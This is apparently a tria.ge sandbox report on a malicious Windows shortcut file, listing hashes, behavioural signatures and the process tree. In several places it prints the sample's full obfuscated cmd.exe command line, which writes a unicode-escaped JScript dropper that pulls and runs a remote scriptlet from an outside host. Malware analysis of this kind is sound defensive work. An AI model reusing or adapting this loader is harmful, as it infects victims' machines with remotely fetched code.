Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
89s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
17/01/2024, 19:05
Static task
static1
Behavioral task
behavioral1
Sample
26586807.lnk
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
26586807.lnk
Resource
win10v2004-20231215-en
General
-
Target
26586807.lnk
-
Size
1KB
-
MD5
bc345cb4f475cf31bd47c9bbbeebc376
-
SHA1
53a989af0ea25a20c022db6d5cda0204dc53d0c5
-
SHA256
8051b39e71554eb5e1bb9455160957c5a5aae1e24f261052e8e871e93420adfc
-
SHA512
8e4eca9cdddd877c7db0411a3a809733660db7e8ebc877870a10b901beb97218b6bb586b5499dc14d3df831d9327fd0ab26b5f336a939997cccfc2bb6e4fc3ef
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 6 3160 WScript.exe 8 3160 WScript.exe 12 3160 WScript.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000_Classes\Local Settings cmd.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4460 conhost.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3900 wrote to memory of 4460 3900 cmd.exe 86 PID 3900 wrote to memory of 4460 3900 cmd.exe 86 PID 4460 wrote to memory of 1476 4460 conhost.exe 87 PID 4460 wrote to memory of 1476 4460 conhost.exe 87 PID 1476 wrote to memory of 8 1476 cmd.exe 90 PID 1476 wrote to memory of 8 1476 cmd.exe 90 PID 1476 wrote to memory of 548 1476 cmd.exe 89 PID 1476 wrote to memory of 548 1476 cmd.exe 89 PID 548 wrote to memory of 3160 548 cmd.exe 91 PID 548 wrote to memory of 3160 548 cmd.exe 91
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\26586807.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3900 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /V/D/c "S^eT URC=C:\XE9MHO\&& mD !URC!>nul 2>&1&&S^eT HAQR=!URC!^XBLOQECJ.JS&&<nul set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); >!HAQR!|caLl !HAQR!||caLl !HAQR! "3⤵
- Suspicious use of WriteProcessMemory
PID:1476 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" caLl C:\XE9MHO\XBLOQECJ.JS"4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:548 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\XE9MHO\XBLOQECJ.JS"5⤵
- Blocklisted process makes network request
PID:3160
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" set/p RDII=var RDII='\u0062\u0071\u0031\u002b\u0044\u0062\u0071\u0031\u002b\u0045\u0062\u0071\u0031\u002b\u0022\u002f\u002f\u0037\u0067\u0062\u0074\u006e\u0061\u0072\u0061\u0069\u0075\u0031\u002e\u0073\u0069\u0063\u006f\u006f\u0070\u0071\u0072\u002e\u006f\u0072\u0067\u002f\u003f\u0031\u002f\u0022\u0029\u003b';URC='\u003a\u0068\u0022\u003b\u0045\u0062\u0071\u0031\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';XBLO='\u0076\u0061\u0072\u0020\u0043\u0062\u0071\u0031\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0062\u0071\u0031\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';HAQR=XBLO+URC+RDII;QECJ=new Function(HAQR);QECJ(); 0<nul 1>C:\XE9MHO\XBLOQECJ.JS"4⤵PID:8
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD568495f1f190ec106bc741fca43f5f81e
SHA102f09cddc42fc54f1a00d908b3a82ac56e51039b
SHA256d112a97755429478ca7a78497feda6455fa490ed6509fcf27c88761e15da2168
SHA512e5e737d9b2ff69a88e88a2464f637026dd04dd2e9c2d8818d7ca70670bdff746de0ef105b011f5efa83b44eae0490731b6ae33ece1d57d1567d916baba020df1
-
Filesize
726B
MD5baeb441ed3f3f6093fa9383acd5dda33
SHA1edca2049e621cc283d4f05f674a118e0a0abdd52
SHA256d0d4de52e5c46d472172a68ad0c3dd5acf103cf986f7dea748ccd673f5efc592
SHA512193bb9446a602ef4a63972864c4c8332397b427434e9b1a9a1507122e23b60275cbb177d29fba329832fcdefbd7ff8d3636db07a6d87cd0599a82dc903a39563